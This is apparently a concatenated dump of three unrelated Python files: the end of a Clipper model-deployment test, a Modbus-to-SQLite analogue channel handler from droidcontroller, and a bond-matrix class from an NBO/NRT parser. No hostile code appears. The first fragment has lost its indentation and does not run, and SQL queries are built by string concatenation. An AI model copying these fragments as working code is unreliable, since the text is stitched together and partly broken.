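    labels = [objective(y, 3) for y in np.random.randint(0, 9, size=10)]
    return TrainingDataset(normalize(records), labels)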
if __name__ == "__main__":
pos_label = 3
import random
cluster_name = "onnx-{}".format(random.randint(0, 5000))
try:
clipper_conn = create_docker_connection(
cleanup=False, start_clipper=True, new_name=cluster_name)
train_path = os.path.join(cur_dir, "data/train.data")
train_x, train_y = parsedata(train_path, pos_label)
train_x = normalize(train_x)
train_loader = TrainingDataset(train_x, train_y)
try:
clipper_conn.register_application(app_name, "integers",
"default_pred", 100000)
time.sleep(1)
addr = clipper_conn.get_query_addr()
response = requests.post(
"http://%s/%s/predict" % (addr, app_name),
headers=headers,
data=json.dumps({
'input': get_test_point()
}))
result = response.json()
if response.status_code != requests.codes.ok:
logger.error("Error: %s" % response.text)
raise BenchmarkException("Error creating app %s" % app_name)
version = 1
model = BasicNN()
nn_model = train(model)
inputs = Variable(torch.randn(len(get_test_point())))
deploy_and_test_model(
clipper_conn, nn_model, inputs, version, link_model=True)
app_and_model_name = "easy-register-app-model"
create_pytorch_endpoint(
clipper_conn,
app_and_model_name,
"integers",
inputs,
predict,
nn_model,
onnx_backend="caffe2")
test_model(clipper_conn, app_and_model_name, 1)
except BenchmarkException:
sys.exit(1)
log_clipper_state(clipper_conn)
logger.exception("BenchmarkException")
clipper_conn = create_docker_connection(
cleanup=True, start_clipper=False, cleanup_name=cluster_name)
sys.exit(1)
else:
clipper_conn = create_docker_connection(
cleanup=True, start_clipper=False, cleanup_name=cluster_name)
except Exception:
logger.exception("Exception")
clipper_conn = create_docker_connection(
cleanup=True, start_clipper=False, cleanup_name=cluster_name)
sys.exit(1)
| apache-2.0 | 3,313,663,111,982,408,000 | 29.484848 | 86 | 0.557938 | false |
dcneeme/droidcontroller | achannels.py | 1 | 26311 | # to be imported to access modbus registers as analogue io
# 03.04.2014 neeme
# 04.04.2014 it works, without periodical execution and without access by svc reg
# 06.04.2014 sequential register read for optimized reading, done
# 14.04.2014 mb[mbi] (multiple modbus connections) support. NOT READY!
# 16.04.2014 fixed mts problem, service messaging ok
from sqlgeneral import * # SQLgeneral / vaja ka time,mb, conn jne
s=SQLgeneral() # sql connection
class Achannels(SQLgeneral): # handles aichannels and aochannels tables
''' Access to io by modbus analogue register addresses (and also via services?).
Modbus client must be opened before.
Able to sync input and output channels and accept changes to service members by their sta_reg code
'''
def __init__(self, in_sql = 'aichannels.sql', out_sql = 'aochannels.sql', readperiod = 10, sendperiod = 30): # period for mb reading, renotify for udpsend
self.setReadPeriod(readperiod)
self.setSendPeriod(sendperiod)
self.in_sql = in_sql.split('.')[0]
self.out_sql = out_sql.split('.')[0]
self.s = SQLgeneral()
self.Initialize()
def setReadPeriod(self, invar):
''' Set the refresh period, executes sync if time from last read was earlier than period ago '''
self.readperiod = invar
def setSendPeriod(self, invar):
''' Set the send (renotify) period; a new report is sent if more than this period has passed since the last one '''
self.sendperiod = invar
def sqlread(self,table):
self.s.sqlread(table) # read the given channel table
def Initialize(self): # before using this create s=SQLgeneral()
''' initialize delta t variables, create tables and modbus connection '''
self.ts = round(time.time(),1)
self.ts_read = self.ts # time of last read
self.ts_send = self.ts -150 # time of last reporting
self.sqlread(self.in_sql) # read aichannels
self.sqlread(self.out_sql) # read aochannels if exist
def read_ai_grp(self,mba,regadd,count,mbi=0): # using self.in_sql as the table to store in. mbi - modbus channel index
''' Read sequential register group and store raw into table self.in_sql. Inside transaction! '''
msg='reading data for aichannels group from mbi '+str(mbi)+', mba '+str(mba)+', regadd '+str(regadd)+', count '+str(count)
#print(msg) # debug
if count>0 and mba<>0:
result = mb[mbi].read(mba, regadd, count=count, type='h') # client.read_holding_registers(address=regadd, count=1, unit=mba)
else:
print('invalid parameters for read_ai_grp()!',mba,regadd,count)
return 2
if result != None:
try:
for i in range(count): # tuple to table rows. tuple len is twice count!
Cmd="UPDATE "+self.in_sql+" set raw='"+str(result[i])+"', ts='"+str(self.ts)+"' where mba='"+str(mba)+"' and mbi="+str(mbi)+" and regadd='"+str(regadd+i)+"'" # koigile korraga
#print(Cmd) # debug
conn.execute(Cmd)
return 0
except:
traceback.print_exc()
return 1
else:
msg='ai grp data reading FAILED!'
print(msg)
return 1
def sync_ai(self): # analogue input readings to sqlite, to be executed regularly.
#global MBerr
mba=0
val_reg=''
mcount=0
block=0 # error count
#self.ts = time.time()
ts_created=self.ts # use this as the service timestamp
value=0
ovalue=0
Cmd = ''
Cmd3= ''
cur = conn.cursor()
cur3 = conn.cursor()
bfirst=0
blast=0
bmba=0
bmbi=0
bcount=0
try:
Cmd="BEGIN IMMEDIATE TRANSACTION" # hoiab kinni kuni mb suhtlus kestab? teised seda ei kasuta samal ajal nagunii. iga tabel omaette.
conn.execute(Cmd)
#self.conn.execute(Cmd)
Cmd="select mba,regadd,mbi from "+self.in_sql+" where mba<>'' and regadd<>'' group by mbi,mba,regadd" # tsykkel lugemiseks, tuleks regadd kasvavasse jrk grupeerida
cur.execute(Cmd) # selle paringu alusel raw update, hiljem teha value arvutused iga teenuseliikme jaoks eraldi
for row in cur:
mbi=int(row[2]) # already numeric
mba=int(row[0])
regadd=int(row[1])
if bfirst == 0:
bfirst = regadd
blast = regadd
bcount=1
bmba=mba
bmbi=mbi
#print('ai group mba '+str(bmba)+' start ',bfirst,'mbi',mbi) # debug
else: # not the first
if mbi == bmbi and mba == bmba and regadd == blast+1: # sequential group still growing
blast = regadd
bcount=bcount+1
#print('ai group end shifted to',blast) # debug
else: # a new group started, make a query for previous
#print('ai group end detected at regadd',blast,'bcount',bcount) # debugb
#print('going to read ai registers from',bmbi,bmba,bfirst,'to',blast,'regcount',bcount) # debug
self.read_ai_grp(bmba,bfirst,bcount,bmbi) # reads and updates table with previous data
bfirst = regadd # new grp starts immediately
blast = regadd
bcount=1
bmba=mba
bmbi=mbi
#print('ai group mba '+str(bmba)+' start ',bfirst) # debug
if bfirst != 0: # last group yet unread
#print('ai group end detected at regadd',blast) # debugb
#print('going to read ai registers from',bmba,bfirst,'to',blast,'regcount',bcount) # debug
self.read_ai_grp(bmba,bfirst,bcount,bmbi) # reads and updates table
# raw updated for all aichannels
# now process raw -> value, by services. x1 x2 y1 y may be different even if the same mba regadd in use. DO NOT calculate status here, happens separately.
            Cmd="select val_reg from "+self.in_sql+" where mba<>'' and regadd<>'' group by val_reg" # service list
            cur.execute(Cmd) # based on this query, compute value from raw separately for each service member
            for row in cur: # services
                status=0 # initial value; a separate loop per service is needed for this
                val_reg=row[0] # service name
                Cmd3="select * from "+self.in_sql+" where val_reg='"+val_reg+"' and mba<>'' and regadd<>'' order by member" # read the whole info of one service
cur3.execute(Cmd3) # another cursor to read the same table
for srow in cur3: # value from raw and also status
#print repr(srow) # debug
mba=-1 #
regadd=-1
member=0
cfg=0
x1=0
x2=0
y1=0
y2=0
outlo=0
outhi=0
                    ostatus=0 # previous status
                    #tvalue=0 # test, for comparison
                    raw=0
                    ovalue=0 # previous (possibly averaged) value
                    ots=0 # previous timestamp of value, status and raw
                    avg=0 # averaging factor, takes effect from 2 upwards
desc=''
comment=''
# 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
#mba,regadd,val_reg,member,cfg,x1,x2,y1,y2,outlo,outhi,avg,block,raw,value,status,ts,desc,comment # "+self.in_sql+"
if srow[0] != '':
mba=int(srow[0]) # must be int! will be -1 if empty (setpoints)
if srow[1] != '':
regadd=int(srow[1]) # must be int! will be -1 if empty
                    val_reg=srow[2] # this is a string
if srow[3] != '':
member=int(srow[3])
if srow[4] != '':
                        cfg=int(srow[4]) # config byte for both individual and group flags at once, show as hex later
if srow[5] != '':
x1=int(srow[5])
if srow[6] != '':
x2=int(srow[6])
if srow[7] != '':
y1=int(srow[7])
if srow[8] != '':
y2=int(srow[8])
#if srow[9] != '':
# outlo=int(srow[9])
#if srow[10] != '':
# outhi=int(srow[10])
if srow[11] != '':
avg=int(srow[11]) # averaging strength, values 0 and 1 do not average!
                    if srow[12] != '': # block - error counter; if it grows above 3, stop sending?
block=int(srow[12]) #
if srow[13] != '': #
raw=int(srow[13])
if srow[14] != '':
ovalue=eval(srow[14]) # ovalue=int(srow[14])
#if srow[15] != '':
# ostatus=int(srow[15])
if srow[16] != '':
ots=eval(srow[16])
#desc=srow[17]
#comment=srow[18]
                    #instead of the following, see pid interpolate
                    if x1 != x2 and y1 != y2: # config is sane
                        value=(raw-x1)*(y2-y1)/(x2-x1) # linear scaling
value=y1+value
msg=val_reg
#print 'raw',raw,', value',value, # debug
                        if avg>1 and abs(value-ovalue)<value/2: # average it, the jump is not big
                            #if avg>1: # averaging of readings is needed; the value could even be kept as a float!
value=((avg-1)*ovalue+value)/avg # averaging
msg=msg+', averaged '+str(int(value))
else: # no averaging for big jumps
msg=msg+', nonavg value '+str(int(value))
else:
print("val_reg",val_reg,"member",member,"ai2scale PARAMETERS INVALID:",x1,x2,'->',y1,y2,'value not used!')
value=0
status=3 # not to be sent status=3! or send member as NaN?
                    print(msg) # temporarily off; HERE the raw reading for AI is printed
                    #print 'status for AI val_reg, member',val_reg,member,status,'due to cfg',cfg,'and value',value,'while limits are',outlo,outhi # debug
                    #"+self.in_sql+" update with new value and status
                    Cmd="UPDATE "+self.in_sql+" set status='"+str(status)+"', value='"+str(value)+"' where val_reg='"+val_reg+"' and member='"+str(member)+"' and mbi='"+str(mbi)+"'" # remember it
#print Cmd
conn.execute(Cmd)
conn.commit()
#self.conn.commit() # "+self.in_sql+" transaction end
return 0
except:
msg='PROBLEM with '+self.in_sql+' reading or processing: '+str(sys.exc_info()[1])
print(msg)
#syslog(msg)
traceback.print_exc()
sys.stdout.flush()
time.sleep(0.5)
return 1
def sync_ao(self): # synchronizes AI registers with data in aochannels table
#print('write_aochannels start') # debug
        # uses write_register() to write modbus registers to get the desired result (all ao channels must also be defined in the aichannels table!)
respcode=0
mba=0
omba=0 # previous value
val_reg=''
desc=''
value=0
word=0 # 16 bit register value
#comment=''
mcount=0
cur = conn.cursor()
cur3 = conn.cursor()
        ts_created=self.ts # used as the service timestamp
try:
Cmd="BEGIN IMMEDIATE TRANSACTION"
conn.execute(Cmd)
# 0 1 2 3 4 5 6 7
#mba,regadd,bit,bootvalue,value,rule,desc,comment
Cmd="select aochannels.mba,aochannels.regadd,aochannels.value,aochannels.mbi from aochannels left join aichannels \
on aochannels.mba = aichannels.mba AND aochannels.mbi = aichannels.mbi AND aochannels.regadd = aichannels.regadd \
where aochannels.value != aichannels.value" #
# the command above retrieves mba, regadd and value where values do not match in aichannels and aochannels
#print "Cmd=",Cmd
cur.execute(Cmd)
            for row in cur: # got mba, regadd, value and mbi for registers that need to be updated / written
                regadd=0
                mba=0
                mbi=0
                if row[0] != '':
                    mba=int(row[0]) # must be a number
                if row[1] != '':
                    regadd=int(row[1]) # must be a number
                if row[2] != '':
                    value=int(float(row[2])) # may be a decimal number, convert to int!
                if row[3] != '':
                    mbi=int(row[3]) # modbus channel index, used by mb[mbi] below
msg='write_aochannels: going to write value '+str(value)+' to register mba.regadd '+str(mba)+'.'+str(regadd)
print(msg) # debug
#syslog(msg)
#client.write_register(address=regadd, value=value, unit=mba)
''' write(self, mba, reg, type = 'h', **kwargs):
:param 'mba': Modbus device address
:param 'reg': Modbus register address
:param 'type': Modbus register type, h = holding, c = coil
:param kwargs['count']: Modbus registers count for multiple register write
:param kwargs['value']: Modbus register value to write
:param kwargs['values']: Modbus registers values array to write
'''
respcode=respcode+mb[mbi].write(mba=mba, reg=regadd,value=value)
conn.commit() # transaction end - why?
return 0
except:
msg='problem with aochannel - aichannel sync!'
print(msg)
#syslog(msg)
traceback.print_exc()
sys.stdout.flush()
return 1
# write_aochannels() end. FRESHENED DICHANNELS TABLE VALUES AND CGH BITS (0 TO SEND, 1 TO PROCESS)
def get_aivalue(self,svc,member): # returns raw,value,lo,hi,status values based on service name and member number
#(mba,regadd,val_reg,member,cfg,x1,x2,y1,y2,outlo,outhi,avg,block,raw,value,status,ts,desc,comment,type integer)
        Cmd3="BEGIN IMMEDIATE TRANSACTION" # conn3, so the data cannot change while it is being read
conn3.execute(Cmd3)
Cmd3="select value,outlo,outhi,status from "+self.in_sql+" where val_reg='"+svc+"' and member='"+str(member)+"'"
        #Cmd3="select raw,value,outlo,outhi,status,mba,regadd,val_reg,member from aichannels where val_reg='"+svc+"' and member='"+str(member)+"'" # debug. raw does not come through?
#print(Cmd3) # debug
cursor3.execute(Cmd3)
raw=0
value=None
outlo=0
outhi=0
status=0
found=0
for row in cursor3: # should be one row only
#print(repr(row)) # debug
found=1
#raw=int(float(row[0])) if row[0] != '' and row[0] != None else 0
value=int(float(row[0])) if row[0] != '' and row[0] != None else 0
outlo=int(float(row[1])) if row[1] != '' and row[1] != None else 0
outhi=int(float(row[2])) if row[2] != '' and row[2] != None else 0
status=int(float(row[3])) if row[3] != '' and row[3] != None else 0
if found == 0:
msg='get_aivalue failure, no member '+str(member)+' for '+svc+' found!'
print(msg)
#syslog(msg)
conn3.commit()
#print('get_aivalue ',svc,member,'value,outlo,outhi,status',value,outlo,outhi,status) # debug
return value,outlo,outhi,status
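    # Usage sketch (hypothetical service name and member numbers, for illustration only):
    #   value, outlo, outhi, status = ac.get_aivalue('ABCW', 1)   # read member 1 of service ABCW
    #   if status == 0:
    #       ac.set_aivalue('ABCW', 2, 250)                        # e.g. update a setpoint member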
def set_aivalue(self,svc,member,value): # sets variables like setpoints or limits to be reported within services, based on service name and member number
#(mba,regadd,val_reg,member,cfg,x1,x2,y1,y2,outlo,outhi,avg,block,raw,value,status,ts,desc,comment,type integer)
Cmd="BEGIN IMMEDIATE TRANSACTION" # conn3
conn.execute(Cmd)
Cmd="update aichannels set value='"+str(value)+"' where val_reg='"+svc+"' and member='"+str(member)+"'"
#print(Cmd) # debug
try:
conn.execute(Cmd)
conn.commit()
return 0
except:
msg='set_aivalue failure: '+str(sys.exc_info()[1])
print(msg)
#syslog(msg)
return 1 # update failure
def set_aovalue(self, value,mba,reg): # sets variables to control, based on physical addresses
#(mba,regadd,bootvalue,value,ts,rule,desc,comment)
Cmd="BEGIN IMMEDIATE TRANSACTION" # conn3
conn.execute(Cmd)
Cmd="update aochannels set value='"+str(value)+"' where regadd='"+str(reg)+"' and mba='"+str(mba)+"'"
try:
conn.execute(Cmd)
conn.commit()
return 0
except:
msg='set_aovalue failure: '+str(sys.exc_info()[1])
print(msg)
#syslog(msg)
return 1 # update failure
    def set_aosvc(self,svc,member,value): # to set a readable output channel by the service name and member, using the aichannels table
#(mba,regadd,val_reg,member,cfg,x1,x2,y1,y2,outlo,outhi,avg,block,raw,value,status,ts,desc,comment,type integer) # ai
Cmd="BEGIN IMMEDIATE TRANSACTION"
conn.execute(Cmd)
Cmd="select mba,regadd from "+self.in_sql+" where val_reg='"+svc+"' and member='"+str(member)+"'"
cur=conn.cursor()
cur.execute(Cmd)
mba=None
reg=None
for row in cur: # should be one row only
try:
mba=row[0]
reg=row[1]
                self.set_aovalue(value,mba,reg)
conn.commit()
return 0
except:
msg='set_aovalue failed for reg '+str(reg)+': '+str(sys.exc_info()[1])
print(msg)
#syslog(msg)
return 1
def make_aichannels(self,svc = ''): # send the ai service messages to the monitoring server (only if fresh enough, not older than 2xappdelay). all or just one svc.
mba=0
val_reg=''
desc=''
cur=conn.cursor()
        ts_created=self.ts # used as the service timestamp
        try:
            Cmd="BEGIN IMMEDIATE TRANSACTION" # conn3, handling this whole service group (aichannels) is one transaction
conn.execute(Cmd)
if svc == '': # all services
Cmd="select val_reg from "+self.in_sql+" group by val_reg"
else: # just one
Cmd="select val_reg from "+self.in_sql+" where val_reg='"+svc+"'"
cur.execute(Cmd)
for row in cur: # services
                val_reg=row[0] # service name
                sta_reg=val_reg[:-1]+"S" # name without the last character plus S - the status service name, for analogue values and temperatures
if self.make_aichannel_svc(val_reg,sta_reg) == 0: # successful svc insertion into buff2server
pass
#print('tried to report svc',val_reg,sta_reg)
else:
print('make_aichannel FAILED to report svc',val_reg,sta_reg)
return 1 #cancel
conn.commit() # aichannels transaction end
except:
msg='PROBLEM with aichannels reporting '+str(sys.exc_info()[1])
print(msg)
#syslog(msg)
traceback.print_exc()
sys.stdout.flush()
time.sleep(0.5)
return 1
def make_aichannel_svc(self,val_reg,sta_reg): #
''' make a single service record (with status chk) based on aichannel members and send it away to UDPchannel '''
status=0 # initially
cur=conn.cursor()
lisa=''
        #print 'reading aichannels values for val_reg',val_reg,'with',mcount,'members' # temporary
        Cmd="select * from "+self.in_sql+" where val_reg='"+val_reg+"'" # read the whole info of one service again
        #print Cmd3 # temporary
cur.execute(Cmd) # another cursor to read the same table
mts=0 # max timestamp for svc members. if too old, skip messaging to server
for srow in cur: # service members
#print repr(srow) # debug
mba=-1 #
regadd=-1
member=0
cfg=0
x1=0
x2=0
y1=0
y2=0
outlo=0
outhi=0
            ostatus=0 # previous status
            #tvalue=0 # test, for comparison
            oraw=0
            ovalue=0 # previous (possibly averaged) value
            ots=0 # previous timestamp of value, status and raw
            avg=0 # averaging factor, takes effect from 2 upwards
#desc=''
#comment=''
# 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
#mba,regadd,val_reg,member,cfg,x1,x2,y1,y2,outlo,outhi,avg,block,raw,value,status,ts,desc,comment # aichannels
            mba=int(srow[0]) if srow[0] != '' else 0 # must be int! will be 0 if empty (setpoints)
            regadd=int(srow[1]) if srow[1] != '' else 0 # must be int! will be 0 if empty
            val_reg=srow[2] # this is a string
member=int(srow[3]) if srow[3] != '' else 0
            cfg=int(srow[4]) if srow[4] != '' else 0 # config byte for both individual and group flags at once, show as hex later
x1=int(srow[5]) if srow[5] != '' else 0
x2=int(srow[6]) if srow[6] != '' else 0
y1=int(srow[7]) if srow[7] != '' else 0
y2=int(srow[8]) if srow[8] != '' else 0
outlo=int(srow[9]) if srow[9] != '' else None
outhi=int(srow[10]) if srow[10] != '' else None
avg=int(srow[11]) if srow[11] != '' else 0 # averaging strength, values 0 and 1 do not average!
            #block=int(srow[12]) if srow[12] != '' else 0 # - error counter; if it grows above 3, stop sending?
            oraw=int(srow[13]) if srow[13] != '' else 0
            value=float(srow[14]) if srow[14] != '' else 0 # service member value
            ostatus=int(srow[15]) if srow[15] != '' else 0 # service component status - not used
ots=eval(srow[16]) if srow[16] != '' else 0
#desc=srow[17]
#comment=srow[18]
################ sat
# ai svc STATUS CHK. check the value limits and set the status, according to configuration byte cfg bits values
# use hysteresis to return from non-zero status values
status=0 # initially for each member
if value>outhi: # above hi limit
if (cfg&4) and status == 0: # warning
status=1
if (cfg&8) and status<2: # critical
status=2
if (cfg&12) == 12: # not to be sent
status=3
#block=block+1 # error count incr
else: # return with hysteresis 5%
if value>outlo and value<outhi-0.05*(outhi-outlo): # value must not be below lo limit in order for status to become normal
status=0 # back to normal
# block=0 # reset error counter
if value<outlo: # below lo limit
if (cfg&1) and status == 0: # warning
status=1
if (cfg&2) and status<2: # critical
status=2
if (cfg&3) == 3: # not to be sent, unknown
status=3
#block=block+1 # error count incr
else: # back with hysteresis 5%
if value<outhi and value>outlo+0.05*(outhi-outlo):
status=0 # back to normal
#block=0
#############
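            # Worked example of the checks above (hypothetical numbers): with outlo=20, outhi=80
            # and cfg=4 (warn on high), value=85 gives status 1; cfg=8 would give status 2 and
            # cfg=12 marks the member as not-to-be-sent (status 3). The 5% hysteresis band means
            # a high reading only counts as back to normal below 80-0.05*(80-20)=77.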
#print 'make ai mba ots mts',mba,ots,mts # debug
if mba>0:
if ots>mts:
mts=ots # latest member timestamp for the current service
if lisa != '': # not the first member
lisa=lisa+' ' # separator between member values
lisa=lisa+str(value) # adding member values into one string
# service done
if self.ts-mts < 3*self.readperiod and status<3: # data fresh enough to be sent
sendtuple=[sta_reg,status,val_reg,lisa] # sending service to buffer
# print('ai svc - going to report',sendtuple) # debug
udp.send(sendtuple) # to uniscada instance
else:
msg='skipping ai data send (buff2server wr) due to stale aichannels data, reg '+val_reg+',mts '+str(mts)+', ts '+str(self.ts)
#syslog(msg) # incl syslog
print(msg)
return 1
return 0
    def doall(self): # call this regularly; executes only if the time is right
''' Does everything on time if executed regularly '''
self.ts = round(time.time(),1)
if self.ts - self.ts_read > self.readperiod:
self.ts_read = self.ts
self.sync_ai() #
self.sync_ao() # writes output registers to be changed via modbus, based on feedback on di bits
if self.ts - self.ts_send > self.sendperiod:
self.ts_send = self.ts
self.make_aichannels() # compile services and send away
return 0
| gpl-3.0 | 2,982,232,896,375,325,000 | 45.240773 | 195 | 0.520505 | false |
mtthwflst/terse | Parsers/NRT.py | 1 | 24648 | if __name__ == "__main__":
import sys,os
selfname = sys.argv[0]
full_path = os.path.abspath(selfname)[:]
last_slash = full_path.rfind('/')
dirpath = full_path[:last_slash] + '/..'
print "Append to PYTHONPATH: %s" % (dirpath)
sys.path.append(dirpath)
import copy, string
import math
import numpy
import time,re,logging
from math import sqrt
from Tools import web
from Tools.BetterFile import BetterFile
from Top import Top
from Containers import Topology, AtomicProps
log = logging.getLogger(__name__)
class bondM(Top):
"""
This class represents a resonance structure
"""
def __init__(self, nA, symbols, data, name=''):
self.symbols = symbols
self.data = data
self.name = name
if self.symbols == []:
for i in range(nA):
self.symbols.append("")
if self.data == []:
for i in range(nA):
tmp = []
for j in range(nA):
tmp.append(0)
self.data.append(tmp)
self.wg = 0.0
"""
*
"""
def __getitem__(self,key):
return self.data[key]
"""
*
"""
def __lt__(self, other):
return self.wg < other.wg
"""
*
"""
def __eq__(self, other, CheckSymbols = True):
"""
:param CheckSymbols: If selected, additional check for chemical elements symbols matching will be performed
"""
if CheckSymbols:
match = True
for i in range(len(self.symbols)):
if (self.symbols[i] != other.symbols[i]) \
and (self.symbols[i].upper() != 'X') \
and (other.symbols[i].upper() != 'X'):
match = False
break
if not match:
return False
i = 0
for i in range(len(self.data)):
for j in range(len(self.data[i])):
if self.data[i][j] != other.data[i][j]:
return False
return True
"""
*
"""
    def __sub__(self,other, CheckSymbols = False):
        """
        Subtracts two connectivity matrices
        :param CheckSymbols: If selected, additional check for chemical elements symbols matching will be performed
        :return: a new matrix with difference
        :rtype: an object of class bondM
        """
        diff = copy.deepcopy(self)
if CheckSymbols and (self.symbols != other.symbols):
return False
for i in range(len(self.data)):
for j in range(len(self.data[i])):
diff[i][j] = self[i][j] - other[i][j]
return diff
"""
*
"""
    def __add__(self,other, CheckSymbols = False):
        """
        Adds two connectivity matrices
        :param CheckSymbols: If selected, additional check for chemical elements symbols matching will be performed
        :return: a new matrix with sums
        :rtype: an object of class bondM
        """
        sm = copy.deepcopy(self)
if CheckSymbols and (self.symbols != other.symbols):
return False
for i in range(len(self.data)):
for j in range(len(self.data[i])):
sm[i][j] = self[i][j] + other[i][j]
return sm
"""
*
"""
def __str__(self):
return self.as_matrix()
"""
*
"""
def as_matrix(self):
"""
:returns: a string with resonance structure in matrix format
:rtype: str
"""
nA = len(self.data)
tStr = " "
for i in range(len(self.data)):
tStr += " % 3s" % (self.symbols[i])
tStr += "\n"
tStr += " "
for i in range(len(self.data)):
tStr += " % 3i" % (i+1)
tStr += "\n"
tStr += " "
for i in range(len(self.data)):
tStr += " ---"
tStr += "\n"
for i in range(len(self.data)):
tStr += "%s% 3i | " % (self.symbols[i], i+1)
for b in self.data[i]:
if b == 0:
tStr += " . "
else:
tStr += " %1i " % (b)
tStr += "\n"
return tStr
"""
*
"""
def offDiag(self):
"""
:returns: only off-diagonal elements thus removing information about lone pairs
:rtype: Instance of class bondM
"""
od = copy.deepcopy(self)
for i in range(len(od.data)):
od.data[i][i] = 0
return od
"""
*
"""
def offDiagEQ(self, other):
if self.symbols != other.symbols:
return False
i = 0
for i in range(len(self.data)):
for j in range(len(self.data)):
if i == j:
continue
if self.data[i][j] != other[i][j]:
return False
return True
"""
*
"""
def subset(self, subset):
"""
:param subset: a list of indices of selected atoms
:returns: a submatrix, which is a matrix including only selected atoms
:rtype: instance of class bondM
"""
nA = len(self.data)
# curiously enough, we need to explicitly provide optional empty data, otherwise it will copy the data of the
# current instance!
smallM = bondM(len(subset),symbols = [], data =[])
for i in range(len(subset)):
smallM.symbols[i] = self.symbols[subset[i]-1]
for j in range(len(subset)):
smallM[i][j] = self.data[subset[i]-1][subset[j]-1]
return smallM
"""
*
"""
def as_lines(self,wrap=False):
"""
Return a bond matrix in format compatible with $CHOOSE, $NRTSTR groups
"""
mt = self.data
nA = len(self.data)
s = " STR !"
if self.name:
s += " name="+self.name+','
s+= " weight="+str(self.wg)+','
s+= " symbols="+self.writeSymbols()
s += "\n LONE"
for i in range(nA):
if mt[i][i] > 0:
s = s + " %i %i" % (i+1,mt[i][i])
s = s + " END\n BOND "
counter = 0
for i in range(nA):
for j in range(i+1,nA):
if mt[i][j] == 1:
s = s + " S %i %i" % (i+1,j+1)
counter += 1
if wrap and (counter % 10 == 0):
s = s+ "\n "
if mt[i][j] == 2:
s = s + " D %i %i" % (i+1,j+1)
counter += 1
if wrap and (counter % 10 == 0):
s = s+ "\n "
if mt[i][j] == 3:
s = s + " T %i %i" % (i+1,j+1)
counter += 1
if wrap and (counter % 10 == 0):
s = s+ "\n "
s = s + " END\n END\n"
return s
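    # For illustration (hypothetical structure), the string built above looks like:
    #  STR ! name=main, weight=52.1, symbols=C O H H
    #  LONE 2 2 END
    #  BOND  S 1 2 S 1 3 D 2 4 END
    #  END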
"""
*
"""
def as_choose(self,wrap=False):
"""
Return a bond matrix in format compatible with $CHOOSE, $NRTSTR groups
"""
mt = self.data
nA = len(self.data)
s = " LONE"
for i in range(nA):
if mt[i][i] > 0:
s = s + " %i %i" % (i+1,mt[i][i])
s = s + " END\n BOND "
counter = 0
for i in range(nA):
for j in range(i+1,nA):
if mt[i][j] == 1:
s = s + " S %i %i" % (i+1,j+1)
counter += 1
if wrap and (counter % 10 == 0):
s = s+ "\n "
if mt[i][j] == 2:
s = s + " D %i %i" % (i+1,j+1)
counter += 1
if wrap and (counter % 10 == 0):
s = s+ "\n "
if mt[i][j] == 3:
s = s + " T %i %i" % (i+1,j+1)
counter += 1
if wrap and (counter % 10 == 0):
s = s+ "\n "
s = s + " END\n"
return s
"""
*
"""
def applyMatrix(self, matrix, row=0 ,col=0):
"""
Implements elements of a matrix into self. See source for detailed example
"""
"""
A.data = X X X X X, B = Y Y, row=1,col=1 A.data = X X X X X
X X X X X Y Y A.applyMatrix(B,1,1) => X Y Y X X
X X X X X X Y Y X X
X X X X X X X X X X
X X X X X X X X X X
"""
nX = len(matrix)
nY = len(matrix[0])
for i in range(nX):
for j in range(nY):
self.data[row+i][col+j] = matrix[i][j]
"""
*
"""
def applySubset(self, other, subset):
"""
Updates connectivity matrix for atoms in subset with connectivity matrix given in object of class bondM
"""
for i in range(len(subset)):
for j in range(len(subset)):
self.data[subset[i]-1][subset[j]-1] = other.data[i][j]
"""
*
"""
def writeSymbols(self):
"""
        Converts the list of chemical symbols into a string
"""
s = ''
for Symbol in self.symbols:
if s:
s += ' '
if Symbol == '':
s += '-'
else:
s += Symbol
return s
"""
*
"""
def applyStringSymbols(self,s):
"""
        Converts a string with chemical symbols into a list and applies it to the object
"""
syms = s.split(' ')
for i in range(len(syms)):
if syms[i]=='-':
syms[i]=''
self.symbols = syms
"""
*
"""
def diffColor(self,other):
"""
Compares self and other matrices.
The result is a string representing a difference matrix. The elements that differ are highlighted.
"""
nA = len(self.data)
tStr = " "
for i in range(len(self.data)):
tStr += " % 3s" % (self.symbols[i])
tStr += "\n"
tStr += " "
for i in range(len(self.data)):
tStr += " % 3i" % (i+1)
tStr += "\n"
tStr += " "
for i in range(len(self.data)):
tStr += " ---"
tStr += "\n"
for i in range(len(self.data)):
tStr += "%s% 3i | " % (self.symbols[i], i+1)
for j in range(len(self.data[i])):
if self.data[i][j] != other[i][j]:
tStr += '\033[1;31m'
if self.data[i][j] == 0:
tStr += " . "
else:
tStr += " %1i " % (self.data[i][j])
if self.data[i][j] != other[i][j]:
tStr += '\033[0;00m'
tStr += "\n"
return tStr
"""
*
"""
def pic(self,filename,picformat='svg'):
"""
Generates a graphical file with 2D-representation of the resonance structure
"""
try:
import openbabel as ob
except:
print "Cannot import openbabel"
return
#ValEl = {'H':1, 'B':3,'C':4,'N':5,'O':6,'F':7,'S':6}
#ValEl = {'1':1, '5':3,'6':4,'7':5,'8':6,'9':7,'16':6}
# Import Element Numbers
ati = []
Sym2Num = ob.OBElementTable()
for a in self.symbols:
ElNum = Sym2Num.GetAtomicNum(a)
ati.append(ElNum)
# Import connections
conn = self.data
mol = ob.OBMol()
# Create atoms
for a in ati:
at = ob.OBAtom()
at.SetAtomicNum(a)
mol.AddAtom(at)
# Create connections
val = []
total_LP = 0
for i in range(len(conn)):
total_LP += conn[i][i]
for i in range(len(conn)):
val.append(conn[i][i] * 2)
for j in range(i):
if conn[i][j]==0:
continue
val[i] += conn[i][j]
val[j] += conn[i][j]
atA = mol.GetAtomById(i)
atB = mol.GetAtomById(j)
b = ob.OBBond()
b.SetBegin(atA)
b.SetEnd(atB)
b.SetBO(int(conn[i][j]))
mol.AddBond(b)
for i in range(len(conn)):
atA = mol.GetAtomById(i)
atAN = atA.GetAtomicNum()
FormValEl = CountValenceEl(atAN)
#if total_LP == 0:
# if atAN == 1:
# FullShell = 2
# else:
# FullShell = 8
# FormCharge = FormValEl + int(val[i]) - FullShell
#else:
FormCharge = int(FormValEl - val[i])
#print "atAN, FormValEl, val[i], FullShell"
#print atAN, FormValEl, val[i], FullShell
#FormCharge = FormCharge % 2
atA.SetFormalCharge(FormCharge)
# Export file
mol.DeleteNonPolarHydrogens()
conv = ob.OBConversion()
conv.SetOutFormat(picformat)
conv.AddOption('C')
conv.WriteFile(mol,filename)
#print val
#c2 = ob.OBConversion()
#c2.SetOutFormat('mol2')
#print c2.WriteString(mol)
